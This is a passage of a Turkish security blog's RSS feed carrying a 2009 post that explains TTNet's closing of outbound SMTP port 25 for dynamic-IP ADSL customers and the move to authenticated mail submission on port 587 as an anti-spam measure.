<li><a href='http://blog.lifeoverip.net/2009/01/13/nmapi-zayiflik-tarama-araci-olarak-kullanma-nse/' rel='bookmark' title='Permanent Link: Nmap&#8217;i zayıflık tarama aracı olarak kullanma-NSE'>Nmap&#8217;i zayıflık tarama aracı olarak kullanma-NSE</a></li>
<li><a href='http://blog.lifeoverip.net/2008/03/05/ttnet-wifi-hizmeti-adsl-abonelerine-ucretsiz-oldu/' rel='bookmark' title='Permanent Link: TTNet WiFi hizmeti ADSL abonelerine ucretsiz oldu'>TTNet WiFi hizmeti ADSL abonelerine ucretsiz oldu</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-1035" title="zpam1" src="http://blog.lifeoverip.net/wp-content/uploads/2009/04/zpam1-300x295.jpg" alt="zpam1" width="178" height="177" /></p>
<blockquote><p><em><strong><span style="color: #800000;">Bu konuda turk.internet.com için hazırladığım yazıya aşağıdaki adreslerden erişilebilir</span></strong></em></p>
<p><a href="http://turk.internet.com/haber/yazigoster.php3?yaziid=23903">http://turk.internet.com/haber/yazigoster.php3?yaziid=23903</a></p>
<p><a href="http://turk.internet.com/haber/yazigoster.php3?yaziid=23904">http://turk.internet.com/haber/yazigoster.php3?yaziid=23904</a></p></blockquote>
<p>TTNet&#8217;in  ADSL networkünden yayılan spamlere çare olması amacıyla başlattığı &#8220;<a href="http://www.ttnet.com.tr/web/214-1088-1-1/tr/ttnet/sss_servisler/simdi_eposta_kutunuz_daha_guvenli">Şimdi E-posta Kutunuz Daha Güvenli</a>! &#8220;  projesi malesef ki yeteri kadar anlaşılamadı.  Bu yazıda kısaca TTNet&#8217;in SMTP portunu kapatarak spame nasıl çözüm bulacağı konusunda değerlendirmelerimi aktaracağım.</p>
<p>Proje kapsamında dinamik IPli ADSL abonelerinin tcp/25(SMTP) portu dış dünyaya kapatılacak. Bunun yerine mail gönderim işleminin 587(submission ) portu üzerinden yapılması istenecek.</p>
<p><strong>SMTP  portunun kapatılmasının nedeni TTNet&#8217;in dünya spam servisleri listesinde ilk üçten aşağı düşmemesi.</strong></p>
<p>Ilk bakışta akla  port değiştirmek neyi çözer ki gibi bir düşünce geliyor.  SMTP portu 25 ile Submission portu 587 arasındaki fark bilinirse aslında bu yöntemin spamlerin azaltılması yönündeki gercek etkisi anlaşılır. Aslında keramet port da değil port üzerinde çalışacak olan uygulamada.</p>
<p><strong>SMTP Nasıl Çalışır, Submission SMTP&#8217;e ne ek getirir?</strong></p>
<p>SMTP sunucular kendilerine gelen bir mail üzerinde iki tür işlem yapabilirler</p>
<p>1)Gönderilen mail domaini sistemde tanımlı ise kabul ederler.<br />
2)Gönderilen mail domaini sistemde tanımlı değilse hata dönerler</p>
<p>Bir de sistemin relaya açık olma durumu vardır ki onda da mailin nerden nereye gönerildiğine bakılmaksızın işlem yapılır.<br />
Sıkı yapılandırılmış bir mail sunucuda kayıtlı kullanıcılar mail gönderebilmek icin SMTP AUTH(kimlik dogrulama) yöntemini kullanır. Böylece kullanıcı kendisini sisteme tanıtarak istediği yere mail gönderebilir.</p>
<p>SMTP portu üzerinde SMTP auth özelliği isteğe bağlı olarak aktif edilir(helo/ehlo komutlarıyla). Dolayısı ile SMTP portu üzerinden hem normal kullanıcılar mail gönderme işlemi yapar hem de internetteki diğer smtp sunucuları bağlantı kurarak mail bırakır.</p>
<p><strong><em>Eğer 25 smtp portu üzerinden zorunlu smtp auth yaptırırsak internet üzerindeki mail sunuculardan mail almak imkansız hale gelir.</em></strong></p>
<p>İşte burada Submission yardımımıza koşuyor. SMTP&#8217;den ayrı bir porttan yine smtp protokolünü destekleyen fakat zorunlu smtp-auth isteyen bir servis çalıştırıyoruz(qmail, postfix, exim vs) ve bu porttan bağlanan kullanıcı mail göndermeden önce mutlaka kendisini tanıtması gerekiyor. Böylece TTNet 25. portu kapatarak adsl abonelerinden yayılacak spamleri engelliyor. Normal kullanıcılar ayarlarını 587. port üzerinden yapacağı için mail gönderimlerinde problem çıkmıyor.</p>
<p>Kullanılan yöntem Ttnet&#8217;in kendi uydurduğu, bulduğu bir yöntem değil.Tüm dünyada spamle başı dertte olan ISP&#8217;lerin uzun zamandır(bazıları yeni yeni geçiş yapıyor)kullandığı bir yöntem(<em>bkz. Verizon</em> ).</p>
<p>Toparlamak gerekirse TTNET 25. portu kapatarak dinamik IPli ADSL abonelerinden gönderilen spamleri engelleme istiyor. Bunun icin ADSL abonelerinden 25. port yerine 587. portu kullanmalari istenecek.</p>
<p>Peki submission kullanmaya baslayinca sadece port mu degisecek?</p>
<p>Hayir!</p>
<p><strong>Submission portu SMTP portundan farkli olarak kendisine baglanan her kullacidan zorunlu smtp auth isteyecektir. </strong>Boylece 587 uzerinden sadece mail sunucularda tanımlı kullanıcılar mail gönderebilecek. Spam gondermek isteyen kisiler ilgili sistemde tanimli degilse mesaj gonderemeyecekler. Ek olarak worm vs bulasmıs sistemler dışarı doğru SMTP bağlantısı açamayacağından spam gönderemeyecekler.</p>
<p>Yani sistemde iki tane smtp portu acilacak biri disardan mail alimlari icin(yahoo, hotmail ve diger mail sunucular)digeri de ADSL abonelerinin mail gondermesi icin auth gerektirecek bir port.</p>
<p><strong>Peki bu sistem disardan gelecek spamleri kesecek mi?</strong></p>
<p>Hayir, zira disardan gelen spamler yine 25. porttan gelecekler. Ama amac zaten disardan gelen spamleri kesmek degil, TTnetden spam gonderilmesini engellemek.</p>
<p><strong>Firewall&#8217;dan 587. portumu 25. porta yönlendirsem  çözüm olur mu?</strong></p>
<p>Evet kısa vadede bir çözüm olur fakat spamciler size 25. porttan değil de 587. porttan mail gönderirlerse birşey yapamazsınız. Dolayısıyla 587. portu 25. porta yönlendirmek yerine 25. portta normal smtp servisi 587. portta submission özelliği olan(zorunlu smtp auth gerektiren)mta yazılımı çalıştırmanız gerekir.<br />
<strong>Bizden başka bu yöntemi uygulayıp başarılı olan var mı?</strong></p>
<p>Dünyanın sayılı büyük ISP&#8217;lerinden Verizon spam servisleri listesinde ilk sırada yer alırdı. Bu çalışma(ve başka ek çalışmalar) sonrasında ilk 10 da gözükmüyor.</p>
<p><img class="alignleft size-full wp-image-1034" title="zpam-ser" src="http://blog.lifeoverip.net/wp-content/uploads/2009/04/zpam-ser.png" alt="zpam-ser" width="449" height="339" /></p>
<p>TTNET&#8217;in de bu çalışma sonrası ilk 10&#8242;da gözükmeyeceğine inanıyorum.</p>
<p><strong>Statik IP Adresimde Mail sunucu Çalışıyor Etkilenecek miyim?</strong></p>
<p>Statik IP Adresi kullananlar bu yapılandırmadan etkilenmeyecekler.</p>
<p><strong>Qmail icin submission ayarları. </strong></p>
<p>Qmail kullanıyorsanız Spamdyke yazılımını kullanarak submission özelliğini devreye alabilirsiniz.(Başka yazılımarda mevcut fakat en ağrısız, sızısız olanı Spamdyke)</p>
<p>Submission hakkinda detayli bilgi icin RFC&#8217;si incelenebilir http://www.ietf.org/rfc/rfc2476.txt</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;title=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine&amp;bodytext=%0D%0ABu%20konuda%20turk.internet.com%20i%C3%A7in%20haz%C4%B1rlad%C4%B1%C4%9F%C4%B1m%20yaz%C4%B1ya%20a%C5%9Fa%C4%9F%C4%B1daki%20adreslerden%20eri%C5%9Filebilir%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23903%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23904%0D%0ATTNet%27in%C2%A0%20ADSL%20network" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;title=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine&amp;notes=%0D%0ABu%20konuda%20turk.internet.com%20i%C3%A7in%20haz%C4%B1rlad%C4%B1%C4%9F%C4%B1m%20yaz%C4%B1ya%20a%C5%9Fa%C4%9F%C4%B1daki%20adreslerden%20eri%C5%9Filebilir%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23903%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23904%0D%0ATTNet%27in%C2%A0%20ADSL%20network" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;t=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;title=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;title=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine&amp;annotation=%0D%0ABu%20konuda%20turk.internet.com%20i%C3%A7in%20haz%C4%B1rlad%C4%B1%C4%9F%C4%B1m%20yaz%C4%B1ya%20a%C5%9Fa%C4%9F%C4%B1daki%20adreslerden%20eri%C5%9Filebilir%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23903%0D%0A%0D%0Ahttp%3A%2F%2Fturk.internet.com%2Fhaber%2Fyazigoster.php3%3Fyaziid%3D23904%0D%0ATTNet%27in%C2%A0%20ADSL%20network" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F&amp;title=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=TTNet%27in%20SMTP%20Portunu%20Kapatmas%C4%B1%20Uzerine%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F14%2Fttnetin-smtp-portunu-kapatmasi-uzerine%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/07/23/ttnet-adsl-ucretsiz-kullanma-rehberi/' rel='bookmark' title='Permanent Link: TTNet ADSL Ücretsiz Kullanma Rehberi'>TTNet ADSL Ücretsiz Kullanma Rehberi</a></li>
<li><a href='http://blog.lifeoverip.net/2009/01/13/nmapi-zayiflik-tarama-araci-olarak-kullanma-nse/' rel='bookmark' title='Permanent Link: Nmap&#8217;i zayıflık tarama aracı olarak kullanma-NSE'>Nmap&#8217;i zayıflık tarama aracı olarak kullanma-NSE</a></li>
<li><a href='http://blog.lifeoverip.net/2008/03/05/ttnet-wifi-hizmeti-adsl-abonelerine-ucretsiz-oldu/' rel='bookmark' title='Permanent Link: TTNet WiFi hizmeti ADSL abonelerine ucretsiz oldu'>TTNet WiFi hizmeti ADSL abonelerine ucretsiz oldu</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/04/14/ttnetin-smtp-portunu-kapatmasi-uzerine/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
	</channel>
</rss>
